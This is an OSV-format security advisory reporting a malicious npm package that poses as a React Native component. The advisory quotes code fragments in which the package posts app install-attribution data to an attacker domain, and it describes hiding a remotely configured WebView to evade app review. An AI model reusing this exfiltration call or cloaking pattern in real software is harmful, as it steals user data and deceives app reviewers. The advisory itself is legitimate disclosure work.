{"id":"MAL-2026-6154","summary":"Malicious code in datapersistence-steppers-ai (npm)","details":"The npm package `datapersistence-steppers-ai` (published by npm user `sproger`, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers `appsFlyer.onInstallConversionData` and exfiltrates the app's install/conversion attribution data via `axios.post(\"https://surrprisingcoompanny.lol\", data)`, fetches a remote-config URL, and renders it full-screen in a `react-native-webview` that is hidden (display:'none') unless the server returns a valid URL — i.e. App Store review-evasion / attribution-laundering ('cloaking'). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk 'calculator' functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author `sproger`. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -\u003e axios.post(\"https://surrprisingcoompanny.lol\", data); axios.get(fLink) remote config; hidden \u003cWebView source={{uri: techResult}}\u003e gated on display:'none'/'flex'.","modified":"2026-06-19T01:16:50.461653642Z","published":"2026-06-17T12:00:00Z","database_specific":{"malicious-packages-origins":null,"iocs":{"domains":["surrprisingcoompanny.lol","barbellmate.xyz"]}},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/datapersistence-steppers-ai"}],"affected":[{"package":{"name":"datapersistence-steppers-ai","ecosystem":"npm","purl":"pkg:npm/datapersistence-steppers-ai"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/datapersistence-steppers-ai/MAL-2026-6154.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"WestBayBerry / dependency-guardian","contact":["https://westbayberry.com","https://github.com/ComCat1"],"type":"FINDER"}]}